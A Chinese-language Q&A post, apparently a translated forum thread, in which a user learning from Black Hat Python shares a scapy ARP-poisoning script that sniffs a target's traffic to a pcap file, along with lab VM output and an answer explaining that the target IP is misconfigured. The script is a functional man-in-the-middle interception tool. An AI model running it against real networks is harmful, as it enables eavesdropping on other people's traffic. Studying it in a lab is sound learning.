在Justin Seitz Black Hat Python书的第四章中,详细介绍了使用scapy进行ARP中毒的部分。我在获取目标机器的目标ip的mac地址时遇到问题。我使用Kali VM作为攻击机器,使用Win 7 VM作为目标机器。
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*} Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses, unanswered = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
conf.iface = interface
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
攻击机器:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
答案 0 :(得分:1)
您使用kali(攻击机器)的IP作为target_ip(10.0.2.15)。 Win在同一台计算机上运行,但在虚拟机中,通常虚拟机具有自己的IP(https://www.quora.com/Do-virtual-machines-have-their-own-IP)
甚至不确定VM上的Win是否自动在同一网络上。在同一/24网络中为VM和kali分配静态IP(即10.0.2.x / 24 - 替换x),请参阅https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
编码器是正确的:首先检查是否通过ping
建立了网络连接